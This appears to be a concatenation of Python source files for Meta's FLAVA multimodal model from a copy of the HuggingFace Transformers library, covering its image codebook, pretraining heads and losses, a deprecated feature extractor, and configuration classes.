self.vocab_size = config.vocab_size
num_layers = self.num_groups * self.num_blocks_per_group
output_blocks = OrderedDict()
output_blocks["relu"] = nn.ReLU()
output_blocks["conv"] = nn.Conv2d(8 * self.hidden_size, self.vocab_size, kernel_size=1, padding=0)
blocks = OrderedDict()
blocks["input"] = nn.Conv2d(self.input_channels, 1 * self.hidden_size, kernel_size=7, padding=3)
blocks["group_1"] = FlavaImageCodebookLayerGroup(
self.num_blocks_per_group, num_layers, 1 * self.hidden_size, 1 * self.hidden_size
)
blocks["group_2"] = FlavaImageCodebookLayerGroup(
self.num_blocks_per_group, num_layers, 1 * self.hidden_size, 2 * self.hidden_size
)
blocks["group_3"] = FlavaImageCodebookLayerGroup(
self.num_blocks_per_group, num_layers, 2 * self.hidden_size, 4 * self.hidden_size
)
blocks["group_4"] = FlavaImageCodebookLayerGroup(
self.num_blocks_per_group, num_layers, 4 * self.hidden_size, 8 * self.hidden_size, use_pool=False
)
blocks["output"] = nn.Sequential(output_blocks)
self.blocks = nn.Sequential(blocks)
self.post_init()
if self.config.freeze:
for param in self.parameters():
param.requires_grad = False
def get_codebook_indices(self, pixel_values: torch.Tensor) -> torch.Tensor:
"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values. Codebook pixel values can be obtained using [`AutoImageProcessor`] by passing
`return_codebook_pixels=True`. See [`FlavaImageProcessor.__call__`] for details.
Examples:
```python
>>> from PIL import Image
>>> import requests
>>> from transformers import AutoImageProcessor, FlavaImageCodebook
>>> model = FlavaImageCodebook.from_pretrained("{0}")
>>> image_processor = AutoImageProcessor.from_pretrained("{0}")
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> inputs = image_processor([image], return_codebook_pixels=True, return_tensors="pt")
>>> inputs = dict(pixel_values=inputs.codebook_pixel_values)
>>> outputs = model.get_codebook_indices(**inputs)
```
""".format(
_CHECKPOINT_FOR_CODEBOOK_DOC
)
z_logits = self.blocks(pixel_values)
return torch.argmax(z_logits, axis=1)
def get_codebook_probs(self, pixel_values: torch.Tensor) -> torch.Tensor:
z_logits = self.blocks(pixel_values)
return nn.Softmax(dim=1)(z_logits)
def forward(self, pixel_values: torch.FloatTensor) -> torch.Tensor:
"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values. Codebook pixel values can be obtained using [`AutoImageProcessor`] by passing
`return_codebook_pixels=True`. See [`FlavaImageProcessor.__call__`] for details.
Examples:
```python
>>> from PIL import Image
>>> import requests
>>> from transformers import AutoImageProcessor, FlavaImageCodebook
>>> model = FlavaImageCodebook.from_pretrained("{0}")
>>> image_processor = AutoImageProcessor.from_pretrained("{0}")
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> inputs = image_processor([image], return_codebook_pixels=True, return_tensors="pt")
>>> inputs = dict(pixel_values=inputs.codebook_pixel_values)
>>> outputs = model(**inputs)
>>> print(outputs.shape)
(1, 196)
```
""".format(
_CHECKPOINT_FOR_CODEBOOK_DOC
)
if len(pixel_values.shape) != 4:
raise ValueError(f"input shape {pixel_values.shape} is not 4d")
if pixel_values.shape[1] != self.input_channels:
raise ValueError(f"input has {pixel_values.shape[1]} channels but model built for {self.input_channels}")
return self.blocks(pixel_values)
class FlavaPredictionHeadTransform(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
if isinstance(config.hidden_act, str):
self.transform_act_fn = ACT2FN[config.hidden_act]
else:
self.transform_act_fn = config.hidden_act
self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = self.transform_act_fn(hidden_states)
hidden_states = self.LayerNorm(hidden_states)
return hidden_states
class FlavaMaskedPredictionHead(nn.Module):
def __init__(self, config, weight=None):
super().__init__()
self.config = config
self.transform = FlavaPredictionHeadTransform(config)
self.decoder = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
self.bias = nn.Parameter(torch.zeros(config.vocab_size))
if weight is not None:
self.decoder.weight = weight
# Need a link between the two variables so that the bias is correctly resized with `resize_token_embeddings`
self.decoder.bias = self.bias
def forward(self, x):
x = self.transform(x)
x = self.decoder(x)
return x
class FlavaITMHead(nn.Module):
def __init__(self, config):
super().__init__()
self.config = config
self.pooler = FlavaPooler(config)
self.seq_relationship = nn.Linear(config.hidden_size, 2)
def forward(self, x):
x = self.pooler(x)
x = self.seq_relationship(x)
return x
class FlavaGlobalContrastiveHead(nn.Module):
def __init__(self, config):
super().__init__()
self.config = config
self.global_backprop_contrastive = config.global_backprop_contrastive
def forward(self, image_embeddings, text_embeddings, logit_scale):
temperature = torch.exp(logit_scale)
if not torch.distributed.is_available() or not torch.distributed.is_initialized():
labels = torch.arange(image_embeddings.size(0), device=image_embeddings.device)
image_embeddings_all = [image_embeddings]
text_embeddings_all = [text_embeddings]
else:
local_batch_size = image_embeddings.size(0)
world_size = torch.distributed.get_world_size()
if self.global_backprop_contrastive:
image_embeddings_all = torch.distributed.nn.functional.all_gather_with_backprop(image_embeddings)
text_embeddings_all = torch.distributed.nn.functional.all_gather_with_backprop(text_embeddings)
else:
image_embeddings_all = [torch.zeros_like(text_embeddings) for _ in range(world_size)]
text_embeddings_all = [torch.zeros_like(image_embeddings) for _ in range(world_size)]
torch.distributed.all_gather(image_embeddings_all, image_embeddings)
torch.distributed.all_gather(text_embeddings_all, text_embeddings)
labels = local_batch_size * torch.distributed.get_rank() + torch.arange(
local_batch_size, device=image_embeddings.device
)
image_embeddings_all = torch.cat(image_embeddings_all)
text_embeddings_all = torch.cat(text_embeddings_all)
logits_per_image = torch.matmul(image_embeddings, text_embeddings_all.transpose(0, 1)) * temperature
logits_per_text = torch.matmul(text_embeddings, image_embeddings_all.transpose(0, 1)) * temperature
return logits_per_image, logits_per_text, labels
@add_start_docstrings(
"""
The FLAVA model for pretraining which outputs losses, embeddings, logits and transformer outputs.
""",
FLAVA_START_DOCSTRING.format(config="FlavaConfig") + FLAVA_PRETRAINING_START_DOCSTRING_EXTRA,
)
class FlavaForPreTraining(FlavaPreTrainedModel):
# Those are linked to xxx.bias
_keys_to_ignore_on_load_missing = [
"mmm_text_head.decoder.bias",
"mmm_image_head.decoder.bias",
"mlm_head.decoder.bias",
"mim_head.decoder.bias",
]
def __init__(self, config: FlavaConfig, image_codebook: Optional[nn.Module] = None):
super().__init__(config)
self.flava = FlavaModel(config)
self.image_codebook = image_codebook
if self.image_codebook is None and config.init_codebook:
self.image_codebook = FlavaImageCodebook(config.image_codebook_config)
# Levarage text and image encoder configs to create the masked
# head since it has the right vocab
self.mim_head = FlavaMaskedPredictionHead(config.image_config)
self.mlm_head = FlavaMaskedPredictionHead(config.text_config)
self.itm_head = FlavaITMHead(config)
self.mmm_image_head = FlavaMaskedPredictionHead(config.image_config)
self.mmm_text_head = FlavaMaskedPredictionHead(config.text_config)
self.global_contrastive_head = FlavaGlobalContrastiveHead(config)
self.image_vocab_size = config.image_config.vocab_size
self.text_vocab_size = config.text_config.vocab_size
self.mlm_weight = config.mlm_weight
self.mim_weight = config.mim_weight
self.global_contrastive_weight = config.global_contrastive_weight
self.ce_ignore_index = config.ce_ignore_index
self.itm_weight = config.itm_weight
self.mmm_image_weight = config.mmm_image_weight
self.mmm_text_weight = config.mmm_text_weight
self.skip_unmasked_multimodal_encoder = config.skip_unmasked_multimodal_encoder
self.post_init()
def _resize_to_2d(self, x: torch.Tensor):
if x.dim() > 2:
x = x.view(x.size(0), -1)
return x
@add_start_docstrings_to_model_forward(
FLAVA_PRETRAINING_INPUTS_DOCSTRING.format("batch_size, text_seq_len", "batch_size, image_num_patches")
)
@replace_return_docstrings(output_type=FlavaForPreTrainingOutput, config_class=FlavaConfig)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
input_ids_masked: Optional[torch.LongTensor] = None,
pixel_values: Optional[torch.FloatTensor] = None,
codebook_pixel_values: Optional[torch.FloatTensor] = None,
attention_mask: Optional[torch.Tensor] = None,
token_type_ids: Optional[torch.Tensor] = None,
bool_masked_pos: Optional[torch.Tensor] = None,
position_ids: Optional[torch.LongTensor] = None,
image_attention_mask: Optional[torch.Tensor] = None,
skip_unmasked_multimodal_encoder: bool = None,
mlm_labels: Optional[torch.Tensor] = None,
mim_labels: Optional[torch.Tensor] = None,
itm_labels: Optional[torch.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: bool = True,
return_dict: Optional[bool] = None,
return_loss: Optional[bool] = None,
) -> Union[Tuple[torch.Tensor], FlavaForPreTrainingOutput]:
"""
Examples:
```python
>>> from PIL import Image
>>> import requests
>>> from transformers import FlavaForPreTraining, AutoProcessor
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> model = FlavaForPreTraining.from_pretrained("facebook/flava-full")
>>> processor = AutoProcessor.from_pretrained("facebook/flava-full")
>>> text = ["a photo of a cat"]
>>> inputs = processor(
... images=[image],
... text=text,
... return_masks=True,
... return_codebook_pixels=True,
... padding=True,
... max_length=77,
... return_tensors="pt",
... )
>>> output = model(**inputs)
```
Return:
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
return_loss = return_loss if return_loss is not None else self.config.return_loss
skip_unmasked_multimodal_encoder = (
skip_unmasked_multimodal_encoder
if skip_unmasked_multimodal_encoder is not None
else self.skip_unmasked_multimodal_encoder
)
if input_ids_masked is None and input_ids is not None:
logger.warning(
"`input_ids_masked` isn't passed which means MLM loss won't be calculated correctlySetting it to"
" `input_ids` so that model can work. Please pass it if this is unintentional. This is usually OKAY if"
" you are doing inference on unmasked text..."
)
input_ids_masked = input_ids
flava_output = self.flava(
input_ids=input_ids,
pixel_values=pixel_values,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
image_attention_mask=image_attention_mask,
# Don't need unmasked multimodal embedding for anything so skip it
# NOTE: ITM uses masked version
skip_multimodal_encoder=skip_unmasked_multimodal_encoder,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
# Pass true to have deterministic outputs
return_dict=True,
)
flava_masked_output = self.flava(
input_ids=input_ids_masked,
pixel_values=pixel_values,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
image_attention_mask=image_attention_mask,
bool_masked_pos=bool_masked_pos,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=True,
)
pos_mask = None
image_embeddings = flava_output.image_embeddings
text_embeddings = flava_output.text_embeddings
image_masked_embeddings = flava_masked_output.image_embeddings
text_masked_embeddings = flava_masked_output.text_embeddings
multimodal_masked_embeddings = flava_masked_output.multimodal_embeddings
total_loss = mim_loss = mlm_loss = mmm_text_loss = mmm_image_loss = gc_loss = itm_loss = None
mim_logits = mlm_logits = mmm_text_logits = mmm_image_logits = None
itm_logits = logits_per_image = logits_per_text = None
# Calculate mim_labels if necessary from the image_codebook
if image_masked_embeddings is not None or multimodal_masked_embeddings is not None:
if mim_labels is None and return_loss:
if self.image_codebook is None:
raise RuntimeError(
"`return_loss` is set to True but the image codebook is not initialized and no `mim_labels` "
" have been passed. Reinstantiate the model with `init_codebook` set to True or "
"pass in your custom `mim_labels`"
)
if codebook_pixel_values is None:
raise ValueError(
"`codebook_pixel_value` are required to generate `mim_labels` if loss is expected. "
"Call `AutoProcessor` with `return_codebook_pixels` set to True"
)
mim_labels = self.image_codebook.get_codebook_indices(codebook_pixel_values)
# Unimodal MIM Loss
# If multimodal embeddings are present, we will calculate MMM loss
if self.mim_weight > 0 and image_masked_embeddings is not None and multimodal_masked_embeddings is None:
sequence_for_image = image_masked_embeddings
if mim_labels is not None:
mim_labels = self._resize_to_2d(mim_labels)
bool_masked_pos = self._resize_to_2d(bool_masked_pos)
mim_labels[bool_masked_pos.ne(True)] = self.ce_ignore_index
sequence_for_image = sequence_for_image[:, -mim_labels.size(1) :, :]
masked_tokens = mim_labels.ne(self.ce_ignore_index)
mim_labels_filtered = mim_labels[masked_tokens]
sequence_for_image = sequence_for_image[masked_tokens, :]
mim_logits = self.mim_head(sequence_for_image)
if return_loss:
mim_loss = nn.functional.cross_entropy(
mim_logits.view(-1, self.image_vocab_size), mim_labels_filtered.view(-1)
)
mim_loss *= self.mim_weight
else:
mim_logits = self.mim_head(sequence_for_image)
# Unimodal MLM Loss
if self.mlm_weight > 0 and text_masked_embeddings is not None and multimodal_masked_embeddings is None:
sequence_for_text = text_masked_embeddings
if mlm_labels is not None:
mlm_labels = self._resize_to_2d(mlm_labels)
sequence_for_text = sequence_for_text[:, -mlm_labels.size(1) :, :]
masked_tokens = mlm_labels.ne(self.ce_ignore_index)
mlm_labels_filtered = mlm_labels[masked_tokens]
sequence_for_text = sequence_for_text[masked_tokens, :]
mlm_logits = self.mlm_head(sequence_for_text)
if return_loss:
mlm_loss = nn.functional.cross_entropy(
mlm_logits.view(-1, self.text_vocab_size), mlm_labels_filtered.view(-1)
)
mlm_loss *= self.mlm_weight
else:
mlm_logits = self.mlm_head(sequence_for_text)
# ITM Loss
if self.itm_weight > 0 and multimodal_masked_embeddings is not None:
itm_logits = self.itm_head(multimodal_masked_embeddings)
if itm_labels is not None:
pos_pairs = itm_labels.ne(0)
pos_mask = torch.where(pos_pairs.any(), pos_pairs, pos_pairs.new([True]))
if return_loss:
itm_loss = nn.functional.cross_entropy(itm_logits, itm_labels)
itm_loss *= self.itm_weight
if multimodal_masked_embeddings is not None:
multimodal_masked_embeddings = multimodal_masked_embeddings[pos_mask]
if mlm_labels is not None:
mlm_labels = mlm_labels[pos_mask]
if mim_labels is not None:
mim_labels = mim_labels[pos_mask]
# MMM Image Loss
if multimodal_masked_embeddings is not None and self.mmm_image_weight > 0:
sequence_for_image = multimodal_masked_embeddings
end_index = image_masked_embeddings.size(1) - 1
sequence_for_image = sequence_for_image[:, 2 : 2 + end_index, :]
if pos_mask is not None:
sequence_for_image = sequence_for_image[pos_mask]
if mim_labels is not None:
mim_labels = self._resize_to_2d(mim_labels)
bool_masked_pos = self._resize_to_2d(bool_masked_pos)
mim_labels[bool_masked_pos.ne(True)] = self.ce_ignore_index
masked_tokens = mim_labels.ne(self.ce_ignore_index)
mim_labels_filtered = mim_labels[masked_tokens]
sequence_for_image = sequence_for_image[masked_tokens, :]
mmm_image_logits = self.mmm_image_head(sequence_for_image)
if return_loss:
mmm_image_loss = nn.functional.cross_entropy(
mmm_image_logits.view(-1, self.image_vocab_size), mim_labels_filtered.view(-1)
)
mmm_image_loss *= self.mmm_image_weight
else:
mmm_image_logits = self.mmm_image_head(sequence_for_image)
# MMM Text Loss
if multimodal_masked_embeddings is not None and self.mmm_text_weight > 0:
sequence_for_text = multimodal_masked_embeddings
sequence_for_text = sequence_for_text[:, -text_masked_embeddings.size(1) :, :]
if pos_mask is not None:
sequence_for_text = sequence_for_text[pos_mask]
if mlm_labels is not None:
mlm_labels = self._resize_to_2d(mlm_labels)
masked_tokens = mlm_labels.ne(self.ce_ignore_index)
mlm_labels_filtered = mlm_labels[masked_tokens]
sequence_for_text = sequence_for_text[masked_tokens, :]
mmm_text_logits = self.mmm_text_head(sequence_for_text)
if return_loss:
mmm_text_loss = nn.functional.cross_entropy(
mmm_text_logits.view(-1, self.text_vocab_size), mlm_labels_filtered.view(-1)
)
mmm_text_loss *= self.mmm_text_weight
else:
mmm_text_logits = self.mmm_text_head(sequence_for_text)
# Global Contrastive Loss
if image_embeddings is not None and text_embeddings is not None and self.global_contrastive_weight > 0:
text_embedding = self.flava.text_projection(text_embeddings[:, 0, :])
text_embedding = nn.functional.normalize(text_embedding, dim=-1)
image_embedding = self.flava.image_projection(image_embeddings[:, 0, :])
image_embedding = nn.functional.normalize(image_embedding, dim=-1)
self.flava.logit_scale.data.clamp_(LOGIT_SCALE_CLAMP_MIN, LOGIT_SCALE_CLAMP_MAX)
logits_per_image, logits_per_text, gc_labels = self.global_contrastive_head(
image_embedding, text_embedding, self.flava.logit_scale
)
# Apply ITM negative mask if any
if pos_mask is not None:
logits_per_image = logits_per_image[pos_mask]
logits_per_text = logits_per_text[pos_mask]
gc_labels = gc_labels[pos_mask]
if return_loss:
gc_loss_image = nn.functional.cross_entropy(logits_per_image, gc_labels)
gc_loss_text = nn.functional.cross_entropy(logits_per_text, gc_labels)
gc_loss = (gc_loss_image + gc_loss_text) / 2
gc_loss *= self.global_contrastive_weight
flava_losses = FlavaLosses(
mim=mim_loss,
mlm=mlm_loss,
itm=itm_loss,
global_contrastive=gc_loss,
mmm_image=mmm_image_loss,
mmm_text=mmm_text_loss,
)
if return_loss and not flava_losses.all_none():
total_loss = sum(loss if loss is not None else 0 for loss in flava_losses.values())
if not return_dict:
output = (
image_embeddings,
flava_output.image_output.to_tuple() if flava_output.image_output is not None else None,
text_embeddings,
flava_output.text_output.to_tuple() if flava_output.text_output is not None else None,
flava_output.multimodal_embeddings,
flava_output.multimodal_output.to_tuple() if flava_output.multimodal_output is not None else None,
image_masked_embeddings,
flava_masked_output.image_output.to_tuple() if flava_masked_output.image_output is not None else None,
text_masked_embeddings,
flava_masked_output.text_output.to_tuple() if flava_masked_output.text_output is not None else None,
multimodal_masked_embeddings,
flava_masked_output.multimodal_output.to_tuple()
if flava_masked_output.multimodal_output is not None
else None,
mim_logits,
mlm_logits,
itm_logits,
logits_per_image,
logits_per_image,
mmm_image_logits,
mmm_text_logits,
)
if return_loss and not flava_losses.all_none():
output = (
total_loss,
flava_losses,
) + output
# Filter None as transformer by default won't handle it
return tuple(x for x in output if x is None)
return FlavaForPreTrainingOutput(
loss=total_loss,
loss_info=flava_losses,
image_embeddings=image_embeddings,
image_output=flava_output.image_output,
text_embeddings=text_embeddings,
text_output=flava_output.text_output,
multimodal_embeddings=flava_output.multimodal_embeddings,
multimodal_output=flava_output.multimodal_output,
image_masked_embeddings=image_masked_embeddings,
image_masked_output=flava_masked_output.image_output,
text_masked_embeddings=text_masked_embeddings,
text_masked_output=flava_masked_output.text_output,
multimodal_masked_embeddings=multimodal_masked_embeddings,
multimodal_masked_output=flava_masked_output.multimodal_output,
mim_logits=mim_logits,
mlm_logits=mlm_logits,
itm_logits=itm_logits,
contrastive_logits_per_image=logits_per_image,
contrastive_logits_per_text=logits_per_text,
mmm_image_logits=mmm_image_logits,
mmm_text_logits=mmm_text_logits,
)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 1,201 | src/transformers/models/flava/feature_extraction_flava.py | # coding=utf-8
# Copyright 2022 Meta Platforms authors and The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Feature extractor class for FLAVA."""
import warnings
from ...utils import logging
from .image_processing_flava import FlavaImageProcessor
logger = logging.get_logger(__name__)
class FlavaFeatureExtractor(FlavaImageProcessor):
def __init__(self, *args, **kwargs) -> None:
warnings.warn(
"The class FlavaFeatureExtractor is deprecated and will be removed in version 5 of Transformers. Please"
" use FlavaImageProcessor instead.",
FutureWarning,
)
super().__init__(*args, **kwargs)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 30,831 | src/transformers/models/flava/configuration_flava.py | # coding=utf-8
# Copyright 2022 Meta Platforms authors and The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" FLAVA model configurations"""
import copy
import os
from typing import Any, Dict, Union
from ...configuration_utils import PretrainedConfig
from ...utils import logging
logger = logging.get_logger(__name__)
FLAVA_PRETRAINED_CONFIG_ARCHIVE_MAP = {
"facebook/flava-full": "https://huggingface.co/facebook/flava-full/resolve/main/config.json",
}
class FlavaImageConfig(PretrainedConfig):
r"""
This is the configuration class to store the configuration of a [`FlavaImageModel`]. It is used to instantiate an
FLAVA model according to the specified arguments, defining the model architecture.
Instantiating a configuration with the defaults will yield a similar configuration to that of the FLAVA
[facebook/flava-full](https://huggingface.co/facebook/flava-full) architecture.
Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
documentation from [`PretrainedConfig`] for more information.
Args:
hidden_size (`int`, *optional*, defaults to 768):
Dimensionality of the encoder layers and the pooler layer.
num_hidden_layers (`int`, *optional*, defaults to 12):
Number of hidden layers in the Transformer encoder.
num_attention_heads (`int`, *optional*, defaults to 12):
Number of attention heads for each attention layer in the Transformer encoder.
intermediate_size (`int`, *optional*, defaults to 3072):
Dimensionality of the "intermediate" (i.e., feed-forward) layer in the Transformer encoder.
hidden_act (`str` or `function`, *optional*, defaults to `"gelu"`):
The non-linear activation function (function or string) in the encoder and pooler. If string, `"gelu"`,
`"relu"`, `"selu"` and `"gelu_new"` are supported.
hidden_dropout_prob (`float`, *optional*, defaults to 0.1):
The dropout probabilitiy for all fully connected layers in the embeddings, encoder, and pooler.
attention_probs_dropout_prob (`float`, *optional*, defaults to 0.1):
The dropout ratio for the attention probabilities.
initializer_range (`float`, *optional*, defaults to 0.02):
The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
layer_norm_eps (`float`, *optional*, defaults to 1e-12):
The epsilon used by the layer normalization layers.
image_size (`int`, *optional*, defaults to 224):
The size (resolution) of each image.
patch_size (`int`, *optional*, defaults to 16):
The size (resolution) of each patch.
num_channels (`int`, *optional*, defaults to 3):
The number of input channels.
qkv_bias (`bool`, *optional*, defaults to `True`):
Whether to add a bias to the queries, keys and values.
mask_token (`bool`, *optional*, defaults to `True`):
Whether to use a mask token or not. Used in MIM (Masked Image Modeling) loss for FLAVA.
vocab_size (`int`, *optional*, defaults to 8192):
Vocabulary size of the [`FlavaImageCodebook`] used in conjunction with [`FlavaImageModel`] for MIM (Masked
Image Modeling) loss for FLAVA.
Example:
```python
>>> from transformers import FlavaImageConfig, FlavaImageModel
>>> # Initializing a FlavaImageModel with style configuration
>>> configuration = FlavaImageConfig()
>>> # Initializing a FlavaImageModel model (with random weights) from the style configuration
>>> model = FlavaImageModel(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
```"""
model_type = "flava_image_model"
def __init__(
self,
hidden_size: int = 768,
num_hidden_layers: int = 12,
num_attention_heads: int = 12,
intermediate_size: int = 3072,
hidden_act: int = "gelu",
hidden_dropout_prob: float = 0.0,
attention_probs_dropout_prob: float = 0.0,
initializer_range: float = 0.02,
layer_norm_eps: float = 1e-12,
image_size: int = 224,
patch_size: int = 16,
num_channels: int = 3,
qkv_bias: bool = True,
mask_token: bool = True,
vocab_size: int = 8192,
**kwargs,
):
super().__init__(**kwargs)
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.initializer_range = initializer_range
self.layer_norm_eps = layer_norm_eps
self.image_size = image_size
self.patch_size = patch_size
self.num_channels = num_channels
self.qkv_bias = qkv_bias
self.mask_token = mask_token
self.vocab_size = vocab_size
@classmethod
def from_pretrained(cls, pretrained_model_name_or_path: Union[str, os.PathLike], **kwargs) -> "PretrainedConfig":
config_dict, kwargs = cls.get_config_dict(pretrained_model_name_or_path, **kwargs)
# get the image config dict if we are loading from FlavaConfig
if config_dict.get("model_type") == "flava":
config_dict = config_dict["image_config"]
if "model_type" in config_dict and hasattr(cls, "model_type") and config_dict["model_type"] != cls.model_type:
logger.warning(
f"You are using a model of type {config_dict['model_type']} to instantiate a model of type "
f"{cls.model_type}. This is not supported for all configurations of models and can yield errors."
)
return cls.from_dict(config_dict, **kwargs)
class FlavaTextConfig(PretrainedConfig):
r"""
This is the configuration class to store the configuration of a [`FlavaTextModel`]. It is used to instantiate an
FLAVA model according to the specified arguments, defining the model architecture.
Instantiating a configuration with the defaults will yield a similar configuration to that of the FLAVA
[facebook/flava-full](https://huggingface.co/facebook/flava-full) architecture.
Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
documentation from [`PretrainedConfig`] for more information.
Args:
vocab_size (`int`, *optional*, defaults to 30522):
Vocabulary size of the BERT model. Defines the number of different tokens that can be represented by the
`inputs_ids` passed when calling [`FlavaTextModel`].
type_vocab_size (`int`, *optional*, defaults to 2):
The vocabulary size of the `token_type_ids` passed when calling [`FlavaTextModel`]. Note that even though
text encoder allows `token_type_ids`'s value as 2, for text-only pretraining and fine-tuning, only 1 is
used similar to RoBERTa.
max_position_embeddings (`int`, *optional*, defaults to 512):
The maximum sequence length that this model might ever be used with. Typically set this to something large
just in case (e.g., 512 or 1024 or 2048). For VL, max_length passed to model is 77.
position_embedding_type (`str`, *optional*, defaults to `"absolute"`):
Type of position embedding. Choose one of `"absolute"`, `"relative_key"`, `"relative_key_query"`. For
positional embeddings use `"absolute"`. For more information on `"relative_key"`, please refer to
[Self-Attention with Relative Position Representations (Shaw et al.)](https://arxiv.org/abs/1803.02155).
For more information on `"relative_key_query"`, please refer to *Method 4* in [Improve Transformer Models
with Better Relative Position Embeddings (Huang et al.)](https://arxiv.org/abs/2009.13658).
hidden_size (`int`, *optional*, defaults to 768):
Dimensionality of the encoder layers and the pooler layer.
num_hidden_layers (`int`, *optional*, defaults to 12):
Number of hidden layers in the Transformer encoder.
num_attention_heads (`int`, *optional*, defaults to 12):
Number of attention heads for each attention layer in the Transformer encoder.
intermediate_size (`int`, *optional*, defaults to 3072):
Dimensionality of the "intermediate" (i.e., feed-forward) layer in the Transformer encoder.
hidden_act (`str` or `function`, *optional*, defaults to `"gelu"`):
The non-linear activation function (function or string) in the encoder and pooler. If string, `"gelu"`,
`"relu"`, `"selu"` and `"gelu_new"` are supported.
hidden_dropout_prob (`float`, *optional*, defaults to 0.1):
The dropout probabilitiy for all fully connected layers in the embeddings, encoder, and pooler.
attention_probs_dropout_prob (`float`, *optional*, defaults to 0.1):
The dropout ratio for the attention probabilities.
initializer_range (`float`, *optional*, defaults to 0.02):
The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
layer_norm_eps (`float`, *optional*, defaults to 1e-12):
The epsilon used by the layer normalization layers.
image_size (`int`, *optional*, defaults to 224):
The size (resolution) of each image.
patch_size (`int`, *optional*, defaults to 16):
The size (resolution) of each patch.
num_channels (`int`, *optional*, defaults to 3):
The number of input channels.
qkv_bias (`bool`, *optional*, defaults to `True`):
Whether to add a bias to the queries, keys and values.
Example:
```python
>>> from transformers import FlavaTextConfig, FlavaTextModel
>>> # Initializing a FlavaTextModel with style configuration
>>> configuration = FlavaTextConfig()
>>> # Initializing a FlavaTextModel model (with random weights) from the style configuration
>>> model = FlavaTextModel(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
```"""
model_type = "flava_text_model"
def __init__(
self,
vocab_size: int = 30522,
type_vocab_size: int = 2,
max_position_embeddings: int = 512,
position_embedding_type: str = "absolute",
hidden_size: int = 768,
num_hidden_layers: int = 12,
num_attention_heads: int = 12,
intermediate_size: int = 3072,
hidden_act: str = "gelu",
hidden_dropout_prob: float = 0.0,
attention_probs_dropout_prob: float = 0.0,
initializer_range: float = 0.02,
layer_norm_eps: float = 1e-12,
pad_token_id: int = 0,
qkv_bias: bool = True,
**kwargs,
):
super().__init__(**kwargs)
self.vocab_size = vocab_size
self.type_vocab_size = type_vocab_size
self.max_position_embeddings = max_position_embeddings
self.position_embedding_type = position_embedding_type
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.initializer_range = initializer_range
self.layer_norm_eps = layer_norm_eps
self.qkv_bias = qkv_bias
self.pad_token_id = pad_token_id
@classmethod
def from_pretrained(cls, pretrained_model_name_or_path: Union[str, os.PathLike], **kwargs) -> "PretrainedConfig":
config_dict, kwargs = cls.get_config_dict(pretrained_model_name_or_path, **kwargs)
# get the text config dict if we are loading from FlavaConfig
if config_dict.get("model_type") == "flava":
config_dict = config_dict["text_config"]
if "model_type" in config_dict and hasattr(cls, "model_type") and config_dict["model_type"] != cls.model_type:
logger.warning(
f"You are using a model of type {config_dict['model_type']} to instantiate a model of type "
f"{cls.model_type}. This is not supported for all configurations of models and can yield errors."
)
return cls.from_dict(config_dict, **kwargs)
class FlavaMultimodalConfig(PretrainedConfig):
r"""
This is the configuration class to store the configuration of a [`FlavaMultimodalModel`]. It is used to instantiate
an FLAVA model according to the specified arguments, defining the model architecture.
Instantiating a configuration with the defaults will yield a similar configuration to that of the FLAVA
[facebook/flava-full](https://huggingface.co/facebook/flava-full) architecture.
Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
documentation from [`PretrainedConfig`] for more information.
Args:
hidden_size (`int`, *optional*, defaults to 768):
Dimensionality of the encoder layers and the pooler layer.
num_hidden_layers (`int`, *optional*, defaults to 12):
Number of hidden layers in the Transformer encoder.
num_attention_heads (`int`, *optional*, defaults to 12):
Number of attention heads for each attention layer in the Transformer encoder.
intermediate_size (`int`, *optional*, defaults to 3072):
